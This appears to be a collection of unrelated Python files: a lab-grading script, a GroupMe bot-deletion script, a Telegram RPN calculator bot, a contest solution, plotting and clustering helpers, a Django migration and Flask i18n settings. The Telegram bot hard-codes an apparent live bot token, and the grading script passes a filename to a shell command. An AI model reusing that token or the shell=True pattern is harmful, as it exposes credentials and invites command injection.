# Make student submissions importable by the grading module.
sys.path.insert(1, f"./{dir['sub']}")
colorama.init()
print(Style.BRIGHT)
gm.print_tests(solutions, tests)
print(Fore.WHITE)
# Grade each submission file named like LASTNAME_ID[...].py (optionally with
# a "late" marker token).
for lab in os.listdir(f"./{dir['sub']}"):
    file_info = lab.split('_')
    if len(file_info) < 2 or '.py' not in lab:
        continue
    # Resume support: skip names before the chosen starting letter.
    if target_letter != '' and file_info[0][0] < target_letter:
        continue
    target_letter = ''
    id = file_info[1] if 'late' not in file_info[1] else file_info[2]
    if 'late' in file_info[1]:
        print('----------LATE LAB----------')
    print(Fore.GREEN, '###################################### NEW LAB ########################################', Fore.WHITE, sep='')
    print(Style.NORMAL, Back.WHITE, Fore.BLACK, f'{file_info[0]}\'s lab #ID: {id}', Back.RESET, Style.BRIGHT, '\n', sep='')
    try:
        temp_grade = 'r'
        repeat = False
        # Outer loop: re-run the grade when the grader picks 'r' (repeat).
        while temp_grade == 'r':
            gm.grade_script(lab, dir['sub'], tests, solutions, output_only, verbose, modify=modify, methods=methods, repeat=repeat)
            if check_file:
                grade = gm.file_check(file_info[0], id, file_sol, verbose)
            temp_grade = 'h'
            repeat = False
            print(Style.NORMAL, Back.WHITE, Fore.BLACK, f'{file_info[0]}\'s lab #ID: {id}', Fore.WHITE, Back.RESET, Style.BRIGHT, '\n', sep='')
            # Inner loop: interactive menu until a non-'h' choice is made.
            while temp_grade == 'h':
                print('Enter S, R, M, Q, O, H for Help, or nothing to move on.')
                temp_grade = input('Option> ').lower()
                if temp_grade == '':
                    continue
                elif temp_grade == 'q':
                    print('Exiting')
                    sys.exit()
                elif temp_grade == 'm':
                    # Move the graded lab out of the submissions folder.
                    shutil.move(f"./{dir['sub']}/{lab}", dir['grad'])
                elif temp_grade == 's': # Create list of skipped?
                    # NOTE(review): the letter is read into get_letter but
                    # target_letter is never updated — the resume feature
                    # appears to be a no-op; confirm.
                    get_letter = input('Enter first letter of last name: ')
                elif temp_grade == 'o':
                    subprocess.run(f"{editor} \"./{dir['sub']}/{lab}\"", shell=True)
                    temp_grade = 'h'
                elif temp_grade == 'r':
                    print('Repeating...')
                    repeat = True
                else:
                    print("""Options:
\n - S to start from a different last name.
\n - R to repeat the last lab.
\n - M to move last lab to graded folder.
\n - Q to quit.
\n - O to open last lab in text editor, configurable in config file.
\n - H to repeat this message.\n""")
                    temp_grade = 'h'
    except Exception as e:
        print(repr(e))
        print('Error occured, exiting')
        sys.exit()
    print()
|
import groupy

# WARNING: destructive one-shot script — permanently deletes every GroupMe
# bot owned by the authenticated account.
for bot in groupy.Bot.list():
    bot.destroy()
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#================================= HEADER ====================================
import logging
import telegram
from telegram.error import NetworkError, Unauthorized
from time import sleep
#-------------------------------------------------------------------------------
#================================ TELEGRAM ===================================
class TelegramCtrl:
    """Long-polls the Telegram bot API and yields incoming updates wrapped
    as TelegramTask objects."""

    def __init__(self,token):
        print("aaa")  # NOTE(review): leftover debug print
        self.bot = telegram.Bot(token)
        try:
            # Resume from the most recent pending update, if any.
            self.update_id = self.bot.get_updates()[0].update_id
        except IndexError:
            self.update_id = None
        print("bbbb")  # NOTE(review): leftover debug print
        logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
        self.buffer = []  # FIFO of TelegramTask not yet handed out

    def next(self):
        """Return the next incoming update, long-polling until one arrives."""
        if len(self.buffer) > 0:
            return self.buffer.pop(0)
        while len(self.buffer) == 0:
            try:
                for task_conn in self.bot.get_updates(offset=self.update_id, timeout=10):
                    # Advance the offset so this update isn't re-delivered.
                    self.update_id = task_conn.update_id + 1
                    self.buffer.append( TelegramTask(task_conn) )
            except NetworkError:
                # Transient network trouble: back off briefly and retry.
                sleep(1)
        return self.buffer.pop(0)
class TelegramTask:
    """Wraps one Telegram update: read its text and buffer/send replies."""

    def __init__(self,request):
        self.request = request
        self.out_raw = ""

    def __del__(self):
        # Ensure buffered output is delivered even if the caller forgets.
        self.flush()

    def input(self):
        """Return the incoming message text, or "" when there is none."""
        message = self.request.message
        return message.text if message else ""

    def output(self,value):
        """Append *value* to the reply buffer and send it immediately."""
        self.out_raw = self.out_raw + value
        self.flush()

    def flush(self):
        """Reply with any buffered text, then clear the buffer."""
        if not self.out_raw:
            return
        self.request.message.reply_text(self.out_raw)
        self.out_raw = ""
#-------------------------------------------------------------------------------
#================================== MAIN =====================================
class FPU:
    """Tiny RPN (postfix) integer calculator operating on a stack."""

    def __init__(self):
        self.pilha = []  # operand stack ("pilha" = stack)

    def calc(self,raw):
        """Evaluate a space-separated RPN expression such as "1 2 +".

        Numbers are pushed; '+' and '-' pop two operands and push the
        result. Any other token raises ValueError via int(), as before.
        (Removed the per-token debug prints the original left in.)
        """
        for item in raw.split(' '):
            if item == '+':
                self.sum()
            elif item == '-':
                self.sub()
            else:
                self.push(int(item))

    def push(self,val):
        self.pilha.append(val)

    def pop(self):
        return self.pilha.pop()

    def sum(self):
        a = self.pop()
        b = self.pop()
        self.push(a+b)

    def sub(self):
        # Pop order matters: the second pop is the left operand.
        b = self.pop()
        a = self.pop()
        self.push(a-b)
def main_tty():
    """Terminal REPL: read RPN expressions from stdin and print the stack.

    The calculator is created once, so the stack accumulates across lines.
    """
    calculator = FPU()
    while True:
        texto = input()
        calculator.calc(texto)
        print("Resultado(s): ", calculator.pilha)
#-------------------------------------------------------------------------------
#================================== MAIN =====================================
def main():
    """Run the RPN calculator as a Telegram bot: each message is evaluated
    with a fresh FPU and the resulting stack is sent back."""
    print("aqui")  # NOTE(review): leftover debug print
    # SECURITY: bot token hard-coded in source — it is now public; revoke it
    # and load the token from an environment variable or config file.
    client = TelegramCtrl('729071996:AAHkhte8uYNM_1YwO-rbItsheGmKGm6Kl88')
    print("opa")
    while True:
        task = client.next()
        raw = task.input()
        calculator = FPU()
        calculator.calc(raw)
        task.output( str(calculator.pilha) )

#if __name__ == '__main__':
# Runs at import time; Ctrl-C exits cleanly.
try:
    main()
except (KeyboardInterrupt):
    print("saindo")
#-------------------------------------------------------------------------------
|
import sys
import math

# Competitive-programming style solution read from stdin:
# first line "n m", then n lines of integers l[i].
n, m = map(int, sys.stdin.readline().split(' '))
l = [0]*n
for i in range(n):
    l[i] = int(sys.stdin.readline())
# Binary search for a value mv such that sum(mv // l[i]) == m,
# i.e. presumably the time at which exactly m "events" have occurred
# across all n periodic processes — TODO confirm the problem statement.
lb = min(l)*m//n # lower bound
ub = max(l)*math.ceil(m/n) # upper bound
mv = (lb+ub)//2
while lb<ub:
    c = 0 # the number of people
    for i in range(n):
        c += mv//l[i]
    if c < m:
        lb = mv + 1
    elif c > m:
        ub = mv
    else:
        break
    mv = (lb+ub)//2
s = 0
# Answer: the largest multiple of any l[i] that is <= mv.
__max = 0
for i in l:
    tmp = i*(mv//i)
    if tmp > __max:
        __max = tmp
print(__max)
|
from scipy.spatial import distance as scipy_distance
def print_content_summary(centers, coordinates, labels, tweets):
    """Print, for every cluster, its size and the five tweets whose vectors
    are closest (by cosine distance) to the cluster center, with a
    1 - distance "score"."""
    label_list = list(labels)
    for cluster_idx, center in enumerate(centers):
        print("\n======================")
        print('Cluster {} ({} tweets) is approximated by:'.format(
            cluster_idx, label_list.count(cluster_idx)))
        dists = scipy_distance.cdist([center], coordinates, "cosine")[0]
        ranked = sorted(enumerate(dists), key=lambda pair: pair[1])
        for tweet_idx, dist in ranked[:5]:
            print("- ", tweets['tweet_text_clean'].values[tweet_idx].strip(),
                  "(Score: %.3f)" % (1 - dist))
#!env python3
# -*- coding: utf-8 -*-
import pandas as pd
import matplotlib
matplotlib.use('Agg')
from matplotlib import pyplot as plt
import seaborn as sns
import numpy as np
# Three overlapping normal samples with rising mean and shrinking spread.
n = 10000
a = np.random.normal(40, 30, size=n)
b = np.random.normal(60, 20, size=n)
c = np.random.normal(80, 10, size=n)
# Long-format frame (one labelled value per row), as seaborn expects.
df = pd.DataFrame({
    "label": ["a"] * n + ["b"] * n + ["c"] * n,
    "value": np.concatenate([a, b, c])
})
sns.set_style("darkgrid")
sns.set_palette("pastel")
sns.violinplot(data=df, x="label", y="value")
# Agg backend (set above): save to file instead of showing a window.
plt.savefig('violinplot.png')
plt.close('all')
|
# Generated by Django 2.1.4 on 2018-12-28 21:40
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated schema migration: make Speciality.name and
    # SpecialityDetails.name unique, and cascade-delete details together
    # with their parent Speciality. Do not edit by hand.

    dependencies = [
        ('speciality', '0003_auto_20181228_2137'),
    ]
    operations = [
        migrations.AlterField(
            model_name='speciality',
            name='name',
            field=models.CharField(max_length=200, unique=True),
        ),
        migrations.AlterField(
            model_name='specialitydetails',
            name='name',
            field=models.CharField(max_length=200, unique=True),
        ),
        migrations.AlterField(
            model_name='specialitydetails',
            name='speciality',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='speciality.Speciality'),
        ),
    ]
|
from flask import request, session
import flask_babel
from speaklater import make_lazy_string
from babel import Locale
# English is the fallback locale; Spanish is the only shipped translation.
DEFAULT_LOCALE = Locale('en')
TRANSLATIONS = [Locale('es')]
VALID_LOCALES = [DEFAULT_LOCALE] + TRANSLATIONS
# String codes ("en", "es") used for session storage and header matching.
VALID_LOCALE_CODES = [str(l) for l in VALID_LOCALES]
def configure_app(app):
    """Install lazily-translated flask_security messages on *app*.

    NOTE(review): these message strings are gettext msgids — presumably the
    .po translation catalogs key on them byte-for-byte, so even typos (e.g.
    "successfuly") must not be "fixed" here without updating the catalogs.
    """
    def lazy_gettext(string):
        '''
        Like flask_babel's lazy_gettext, but doesn't interpolate strings. This
        is required for integration with flask_security, which does its
        own string interpolation but doesn't support i18n.
        For more information, see: https://github.com/GovLab/noi2/issues/41
        '''
        def gettext_no_interpolate(string):
            # No translations active yet (outside app context): pass through.
            t = flask_babel.get_translations()
            if t is None:
                return string
            return t.ugettext(string)
        return make_lazy_string(gettext_no_interpolate, string)
    # Each value is a (message, category) pair as flask_security expects.
    app.config['SECURITY_MSG_UNAUTHORIZED'] = (
        lazy_gettext('You do not have permission to view this resource.'), 'error')
    app.config['SECURITY_MSG_EMAIL_CONFIRMED'] = (
        lazy_gettext('Thank you. Your email has been confirmed.'), 'success')
    app.config['SECURITY_MSG_ALREADY_CONFIRMED'] = (
        lazy_gettext('Your email has already been confirmed.'), 'info')
    app.config['SECURITY_MSG_INVALID_CONFIRMATION_TOKEN'] = (
        lazy_gettext('Invalid confirmation token.'), 'error')
    app.config['SECURITY_MSG_EMAIL_ALREADY_ASSOCIATED'] = (
        lazy_gettext('%(email)s is already associated with an account.'), 'error')
    app.config['SECURITY_MSG_PASSWORD_MISMATCH'] = (
        lazy_gettext('Password does not match'), 'error')
    app.config['SECURITY_MSG_RETYPE_PASSWORD_MISMATCH'] = (
        lazy_gettext('Passwords do not match'), 'error')
    app.config['SECURITY_MSG_INVALID_REDIRECT'] = (
        lazy_gettext('Redirections outside the domain are forbidden'), 'error')
    app.config['SECURITY_MSG_PASSWORD_RESET_REQUEST'] = (
        lazy_gettext('Instructions to reset your password have been sent to %(email)s.'), 'info')
    app.config['SECURITY_MSG_PASSWORD_RESET_EXPIRED'] = (
        lazy_gettext('You did not reset your password within %(within)s. New '
                     'instructions have been sent to %(email)s.'), 'error')
    app.config['SECURITY_MSG_INVALID_RESET_PASSWORD_TOKEN'] = (
        lazy_gettext('Invalid reset password token.'), 'error')
    app.config['SECURITY_MSG_CONFIRMATION_REQUIRED'] = (
        lazy_gettext('Email requires confirmation.'), 'error')
    app.config['SECURITY_MSG_CONFIRMATION_REQUEST'] = (
        lazy_gettext('Confirmation instructions have been sent to %(email)s.'), 'info')
    app.config['SECURITY_MSG_CONFIRMATION_EXPIRED'] = (
        lazy_gettext('You did not confirm your email within %(within)s. New '
                     'instructions to confirm your email have been sent to '
                     '%(email)s.'), 'error')
    app.config['SECURITY_MSG_LOGIN_EXPIRED'] = (
        lazy_gettext('You did not login within %(within)s. New instructions to '
                     'login have been sent to %(email)s.'), 'error')
    app.config['SECURITY_MSG_LOGIN_EMAIL_SENT'] = (
        lazy_gettext('Instructions to login have been sent to %(email)s.'), 'success')
    app.config['SECURITY_MSG_INVALID_LOGIN_TOKEN'] = (
        lazy_gettext('Invalid login token.'), 'error')
    app.config['SECURITY_MSG_DISABLED_ACCOUNT'] = (
        lazy_gettext('Account is disabled.'), 'error')
    app.config['SECURITY_MSG_EMAIL_NOT_PROVIDED'] = (
        lazy_gettext('Email not provided'), 'error')
    app.config['SECURITY_MSG_INVALID_EMAIL_ADDRESS'] = (
        lazy_gettext('Invalid email address'), 'error')
    app.config['SECURITY_MSG_PASSWORD_NOT_PROVIDED'] = (
        lazy_gettext('Password not provided'), 'error')
    app.config['SECURITY_MSG_PASSWORD_NOT_SET'] = (
        lazy_gettext('No password is set for this user'), 'error')
    app.config['SECURITY_MSG_PASSWORD_INVALID_LENGTH'] = (
        lazy_gettext('Password must be at least 6 characters'), 'error')
    app.config['SECURITY_MSG_USER_DOES_NOT_EXIST'] = (
        lazy_gettext('Specified user does not exist'), 'error')
    app.config['SECURITY_MSG_INVALID_PASSWORD'] = (
        lazy_gettext('Invalid password'), 'error')
    app.config['SECURITY_MSG_PASSWORDLESS_LOGIN_SUCCESSFUL'] = (
        lazy_gettext('You have successfuly logged in.'), 'success')
    app.config['SECURITY_MSG_PASSWORD_RESET'] = (
        lazy_gettext('You successfully reset your password and you have been '
                     'logged in automatically.'), 'success')
    app.config['SECURITY_MSG_PASSWORD_IS_THE_SAME'] = (
        lazy_gettext('Your new password must be different than your previous password.'), 'error')
    app.config['SECURITY_MSG_PASSWORD_CHANGE'] = (
        lazy_gettext('You successfully changed your password.'), 'success')
    app.config['SECURITY_MSG_LOGIN'] = (
        lazy_gettext('Please log in to access this page.'), 'info')
    app.config['SECURITY_MSG_REFRESH'] = (
        lazy_gettext('Please reauthenticate to access this page.'), 'info')
def init_app(app):
    """Hook locale selection into flask_babel and flask_login.

    NOTE(review): uses the Python 2 builtin `unicode` — this module is
    Python-2 only as written.
    """
    babel = app.extensions['babel']
    @babel.localeselector
    def get_locale():
        # An explicit session choice wins; otherwise honour Accept-Language.
        if 'locale' in session and session['locale'] in VALID_LOCALE_CODES:
            return session['locale']
        return request.accept_languages.best_match(VALID_LOCALE_CODES)
    # This forces any "lazy strings" like those returned by
    # lazy_gettext() to be evaluated.
    app.login_manager.localize_callback = unicode
def change_session_locale(locale, session=session):
    """Persist *locale* in the session when it is one we support;
    silently ignore unknown locales."""
    if locale in VALID_LOCALE_CODES:
        session['locale'] = str(locale)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.